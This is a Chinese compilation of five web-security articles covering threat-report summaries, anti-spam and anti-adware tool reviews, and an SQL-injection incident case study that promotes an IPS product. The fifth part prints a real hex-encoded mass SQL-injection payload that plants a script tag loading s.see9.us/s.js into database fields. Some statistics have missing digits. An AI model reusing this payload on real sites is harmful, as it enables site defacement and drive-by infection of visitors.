垃圾邮件、恶意软件和Web威胁创新高
“短腿安娜”通过精心收集,向本站投稿了5篇垃圾邮件、恶意软件和Web威胁创新高,下面是小编为大家整理后的垃圾邮件、恶意软件和Web威胁创新高,仅供大家参考借鉴,希望大家喜欢!
篇1:垃圾邮件、恶意软件和Web威胁创新高
安全厂商迈克菲(McAfee)公司今日宣布,根据迈克菲刚刚发布的《第三季度威胁报告》,在过去三个月,托管未经授权的版权保护内容的新文件共享站点数量激增,该报告还显示,上一季度,垃圾邮件、恶意软件以及基于 Web 的威胁数量达到了创纪录的水平,网络犯罪分子借助 DDoS 攻击威胁来敲诈站点拥有者。
The Pirate Bay 关闭了,盗版依旧猖獗
在创建文件共享站点方面,网络犯罪分子来了个“三级跳”,这种猖獗态势是在知名的 torrent 站点 — 或者托管指向版权保护内容的链接的站点 — The Pirate Bay 在瑞典遭起诉的背景下发生的。随着广大用户开发出越来越多的内容共享站点,恶意软件编写者也伺机引诱想下载版权保护内容的用户下载恶意程序。迈克菲预计,随着秋季大片季的来临。此类恶意站点的数量将大幅增长。
此类站点层出不穷,以欺骗“苦苦寻觅”新的站点来下载版权保护内容的 The Pirate Bay 用户。
研究人员发现,在 The Pirate Bay 关闭过程中,其用户开始创建自己的站点以支持 The Pirate Bay 社区。仅仅 24 小时后,该站点即被备份,而新的 torrent 站点则迅速消失。
分析表明,创建这些与电影界重大事件相关的站点达到了高峰。根据观察,随着夏季大片的密集推出,这种行为会达到高峰,在今年的奥斯卡颁奖礼期间以及 年假期档都出现过峰值。迈克菲预计,今年秋季的“奥斯卡敲门砖”电影的上映以及假期档的来临,类似的高峰又会重现,
垃圾邮件、恶意软件和 Web 威胁增长再创新高
报告还表明,垃圾邮件和恶意软件增长再创新高,上一季度威胁数量超过了以往的记录。由于网络犯罪分子利用名人之死和自然灾难“作足了文章”,因此,基于Web 的攻击也不断增加。
垃圾邮件数量创了历史新高,将 年第二季度创下的原纪录提高了 10%。如今,92% 的电子邮件充斥着垃圾邮件。与 2008 年第三季度相比,垃圾邮件数量激增 24%。
基于 Web 的攻击是最新、最热门的威胁媒介,并已成为网络犯罪分子利用的最危险的工具。这些攻击会以访问恶意网页的任何人为目标,并通过垃圾邮件、网络钓鱼诈骗、社交网络甚至从被劫持的非法网站重定向等手段来实施。55% 的恶意 URL 在美国托管,在利用 搜索引擎优化(SEO) 伎俩引诱受害者访问这些恶意站点方面,网络犯罪分子越来越狡猾、高效。恶意软件编写者会利用诸如名人之死和自然灾难之类的新闻作为幌子以掩盖其恶意企图。
DDoS 攻击
上一季度,McAfee Labs 发现了许多新的分布式拒绝服务 (DDoS) 攻击,其中包括一些索要赎金的攻击。四家澳大利亚体育博采公司在足球和橄榄球决赛等重大赛事期间受到攻击,导致的损失高达数百万美元
DDoS 攻击作为一项网络犯罪分子提供的“服务”越来越受到“青睐”,许多不法之徒提供由数千台僵尸电脑组成的僵尸网络 (botnet),来为出价最高者卖力。这些僵尸网络甚至能够在脱机状况下攻入一些保护最为严密的站点。网络犯罪分子甚至能够像潜在购买者提供几分钟的性能“演示”。本威胁报告包含了一些此类 DDoS 的图片。
篇2:恶意软件仍然是对Windows的最大威胁
微软新发布的一份安全报告显示,恶意远程控制软件仍然是对WindowsPC最大的威胁之一,
在周一发布的安全情报报告中,微软表示,今年上半年发现了000种新的恶意远程控制代码变种,也使得这类软件成为了最活跃的恶意软件。
6月份,微软也将僵尸PC列为了WindowsPC面临的最普遍的威胁。微软在报告中说,以获得经济利益为目的的 都将目光瞄准了这类恶意代码,
微软说,在今年上半年被发现感染有恶意代码的00万台PC中,约00万台PC运行恶意远程控制软件。这些资料是由微软的免费WindowsMaliciousSoftwareRemovalTool收集的。
尽管这一比例相当高,但却低于0下半年的数字,当时,微软发现68%的被感染PC感染有一种后门儿特洛伊木马病毒。同时,通过采用新的基于Web的技术, 正在努力使其僵尸PC网络成为“透明人”。
Rootkit仍然是一种不常见的威胁。微软表示,在过去的半年中,针对Windows计算机的这类攻击减少了50%。
篇3:和垃圾邮件说NO 体验瑞星反垃圾邮件软件WEB安全
只要使用Email,就会受到垃圾邮件的侵扰,让人很是头疼,在不断地与垃圾邮件作斗争后,积累了很多经验,近日瑞星又推出了一个专业的反垃圾邮件软件,通过这个软件可以将大多数的垃圾邮件拒之门外。
安装好瑞星反垃圾邮件软件后它会自动运行,点击系统托盘处的图标,打开“系统设置”标签,软件的所有设置都在里面了。瑞星反垃圾邮件软件支持Outlook、Outlook Express和Foxmail三种主流电子邮件客户端,安装后就会自动扫描所有客户端的邮箱账户并在各自的邮箱账户中建立一个“瑞星垃圾邮箱”(图1),被检测为垃圾邮件的邮件都会被自动移动到这个文件夹中。
图1
提示:与安装正版瑞星杀毒软件一样,安装瑞星反垃圾邮件软件也需要输入序列号。可以使用官方提供的测试序列号:4K9S0R-Q72EP6-M90JS4-SBE200,用户ID:6AZRD63GNF4G,
使用瑞星反垃圾邮件软件基本上不需要用户操什么心,用客户端收取邮件的时候,它就会在后台监控所收的邮件,如果是垃圾邮件,将自动转到“瑞星垃圾邮件”。经过半个月的测试,瑞星反垃圾邮件软件能将绝大部分的垃圾邮件识别出来,偶尔会有几封正常的邮件被误判为垃圾邮件。不过这属于正常现象,现在还没有哪个反垃圾邮件软件能够达到100%准确的识别率。软件同时还提供了邮件统计情况,接收完邮件后可以在“运行状态”标签中查看正常邮件和垃圾邮件的数量和比例,并以直观的统计图呈现给用户,打开瑞星反垃圾邮件软件图标右键菜单中的运行状态进行查看,可以看到有多少封正常邮件,有多少封垃圾邮件(图2)。
图2
整体上来说瑞星反垃圾邮件软件能够很好地阻止垃圾邮件,并且可以自动进行升级,从而识别出更多的垃圾邮件。但是它却有一个致命的缺点,就是不带有学习功能,这样对于那些误判断为垃圾邮件的正常邮件,下次再进行检测,依然会当作垃圾邮件。当然对于一款刚开始公测的软件来说,对它的要求不能过高,希望在下一个版本中有更好的表现。
篇4:拒绝恶意软件 安全上网三大利器WEB安全
网上的资源越来越丰富,但频繁弹出的网络广告窗口却让我很不爽,有些网站则更是霸道,浏览了他们的网站后,你的IE信息就会被偷偷修改掉,上网当然免不了试用一些新软件,而伴随着这些软件在我们电脑中落户的流氓软件更让是人心焦。本文给出了一个综合解决方案,让你安心上网,避免广告窗口的骚扰,轻松将流氓软件清理掉,方便地修复被更改的IE和管理自己的启动程序。
超级兔子
下载:超级兔子魔法设置 7.72正式版
下载:超级兔子上网精灵 v7.65
“超级兔子魔法设置”您肯定用过吧?“上网精灵”就是超级兔子的系列产品,它可以完美拦截各种弹出、漂浮或iCast广告,还你一个干净的网络世界,它还具备上万种恶意程序、木马病毒检测及清除功能,可全面查杀有害代码,清除恶意插件。
让网页广告见鬼去吧
启动“上网精灵”(如图1),勾选“禁止恶意网页修改IE”、“禁止IE窗口及漂浮广告”、“禁止浏览 及内容”,最后点击界面下部的“确定”即可。现在再访问网站试试,浮动广告和弹出窗口全不见了。你还可以到“安全防护”、“IE广告”、“网址过滤”等功能中进行更加灵活的设置。
图1
清理系统和卸载软件
点击桌面上的“优化王”(如图2),在左边选择“清理系统”,然后就可以分别清理文件、注册表、IE记录。这样不仅能加快电脑的运行速度,还能保护自己的隐私;对于特别难以卸载的插件,我们可以使用“专业卸载”功能,在左侧选中该功能后,在右侧窗口(如图3)就会列出所支持卸载的软件,看看有没有你不想要的软件,点击需要卸载的软件,按“下一步”再重启就OK了。
图2
图3全面修复IE系统
运行“IE修复专家”(如图4),首先选择左侧的“检测恶意程序及木马”功能,让该软件对你的系统进行全面的检测,如果发现恶意程序和木马病毒,便会在右侧窗口中显示出来,这时只要单击“一键清除”按钮即可清除恶意程序及恢复IE原有设置。如果你是电脑高手,那么可使用“全面修复IE系统”功能来通过手工设置来修复IE。
图4
流氓软件清理助手
下载:流氓软件清理助手 1.4.7
“流氓软件清理助手”可以轻松清理包括DUDU下载加载器、网络猪、3721上网助手等在内的15个强制安装或难以卸载的软件,
它本身是绿色软件,无需安装,直接运行Roguecleaner.exe即可(如图5),点击“检测”按钮,很快在左侧窗口中就看到检测结果。点击“清理”按钮后软件会自动将它们清理掉。
图5
如果你不想清除某个功能,如“完美网译通”,那么在清理前你可以在“设置”中将“完美网译通”前的勾去掉(如图6),这样在清理时就会将“完美网译通”给您留下了。
图6
最好在安全模式下使用该软件,清理前最好备份注册表,以便清理后如果出现系统问题能够及时恢复。
该软件采用了独特的查杀引擎,在检测流氓软件的同时,也可以把流氓软件清除得更彻底,即使用您用别的软件清理后未清理干净的残留文件它也能清理。IE优化修复专家
下载:IE优化修复专家2006
“IE优化修复专家2006”是一款集IE浏览器修复、网络浏览加速、系统安全修复和设置、Active控件免疫等多项功能于一体、全面解决IE浏览器常见问题的功能强大的工具软件,其修复选项多达100项,彻底解决常见的IE错误。
1.IE高级设置(如图7):可以根据用户的需要对IE菜单、Internet选项、IE右键菜单和IE附加地址栏进行全面设置。
图7
2.IE快速修复(如图8),可快速修复IE标题栏、首页、搜索引擎、分级审查密码、工具栏按钮、工具栏菜单等;
图8
3.系统快速修复(如图9):可以快速修复被禁止的注册表编辑器、控制面板、被非法隐藏的驱动器、EXE文件关联等多种系统错误,彻底解决用户的后顾之忧。
图94.流氓插件免疫(如图10):软件内置了常见的几十种插件的免疫,可以彻底屏蔽我们上网时那些烦人的弹出式安装证书对话框,但没有清除流氓软件的功能。
图10
另外,该软件还有“启动项目管理”(管理启动时自动运行的程序)、“IE设置备份”、“IE地址栏管理”和“网络浏览加速”等功能,对我们也大有帮助。
有了上述工具的护航,上网便可高枕无忧了!
篇5:警惕恶意软件破坏 网站SQL注入防御实战WEB安全
SQL注入作为直接威胁web业务的最严重攻击行为,已经被大多数的网站管理员所了解,这种通过HTTP标准端口,利用网页编码不严谨,提交精心构造的代码实现对数据库非授权访问的攻击方法,已经被越来越多的scriptguy(脚本小子)成功掌握并广泛实践,没错,他们可能并不知道SQL注入的原理,不知道ASP,不知道PHP,但他们有工具,全自动的,完善的,高效率的工具,这些工具使得任何一个有简单网络知识的中学学生可以很容易的拿到某个 的最高管理员权限,而且做这些事情并不会比你在周六的中午下楼去买一听可乐要更困难。
而随着互联网黑色产业链的浮出水面,骇客们发现攻击网站不仅仅可以用作向朋友炫耀的资本,还可以作为购买游戏点卡或者是数码相机的资金来源:在被攻击的网站嵌入脚本木马,可以轻易盗窃那些访问了受攻击网站,但个人PC安全防护措施不全面用户的私密信息,比如游戏账号密码,或者是银行账号密码。
经常使用google的用户一定对这段话不陌生“该网站可能含有恶意软件,有可能会危害您的电脑”,这意味着这个网站也许已经遭遇挂马黑手,成为骇客们的众多取款点之一。本文就一例真实案例,来介绍一下网站的安全防护。
某市房地产网站的管理员小****上班就被叫到领导办公室去了,因为网站带上了google小尾巴:“该网站可能含有恶意软件,有可能会危害您的电脑”,购房者看到这一提示信息,纷纷给该市房产管理局打电话,于是就有了上面的一幕。回到座位上的小李一筹莫展:网站服务器已经全盘杀毒好几次了,没有发现病毒存在的痕迹,看来只能找专业安全厂商解决了。小李选择的是国内著名的一家网络安全公司,在向该安全公司提交web日志的第二天,小李就收到了回信,从日志的分析结果中,可以清楚的看到骇客的攻击走向:这是一次非常典型的SQL注入攻击,首先使用dEcLaRe建立游标,遍历数据库中所有允许写入字符串的相关字段,并通过执行exec操作,使用update语句替换了网站页面的正常文件,插入了如下一段十六进制字符:
exec('UpDaTe%20['%2b@t%2b']%20sEt%20['%2b@c%2b']
=rtrim(convert(varchar,['%2b@c%2b']))%2bcAsT(0x223E3C2F7469746C653E3C736372697074207372633D68
7474703A2F2F732E736565392E75732F732E6A733E3C2F7363
726970743E3C212D2D%20aS%20vArChAr(67))')%20f
经过解密,可以得到如下字符串
"][/title][script. src=s.see9.us/s.js][/script][!—
这里面的s.see9.us/s.js就是导致网站带有小尾巴的罪魁祸首,
经过一天的奋力工作,网页中所有的小尾巴都清理干净了,在安全工程师的建议下,小李还向StopBadware.org 申请了重新的索引,并向google提交了审核申请。做完了这些之后,小李又一次陷入了困扰:如何防范网站再次遭受SQL注入攻击呢?网络上提供了一些代码修改级的防御方法,可是需要对每一个页面都做仔细的检查,看着自己所负责网站的10000余个页面,小李只能是苦笑,联想起2007年夏天那次微软英国网站被SQL注入的案例,小李在内心否认了彻底检查一遍页面代码的做法。关键时刻,又是安全工程师提出了建议:部署天清入侵防御产品,利用天清IPS的基于注入攻击手法的检测原理,可以对各种SQL注入攻击的变种进行防御。和传统的SQL注入防御方法不一样的是,天清入侵防御产品可以独立部署,不需要对被保护的web系统做任何修改,而且和那些基于特征的检测方法不一样的是,天清IPS采用的VSID算法关注的是攻击手法而非攻击代码,其检测准确率有很大改善。
在部署了入侵防御产品的当天晚上,小李就在入侵防御产品的控制中心看到了发现了SQL注入攻击并被阻断的报警信息,而网站安然无恙。
友情提示:对于防御SQL注入攻击,检查网页代码是必要的,骇客获得网站权限,并不仅仅为了炫耀,可能还会有更肮脏的目的;其次,你需要做的事是挽回名誉损失,毕竟挂上google小尾巴不是件光荣的事;最后,你绝对不能忘记的事还有修补漏洞,在没有“打扫”干净你的系统前,骇客进出你的网络将会像喝下午茶一样简单,你可以选择修改源代码来过滤关键字(记住不要矫枉过正,笔者就见过不允许用户名叫select/and等SQL关键字的网站),或者是你也可以选择使用专业的IPS产品。
【垃圾邮件、恶意软件和Web威胁创新高】相关文章:
文档为doc格式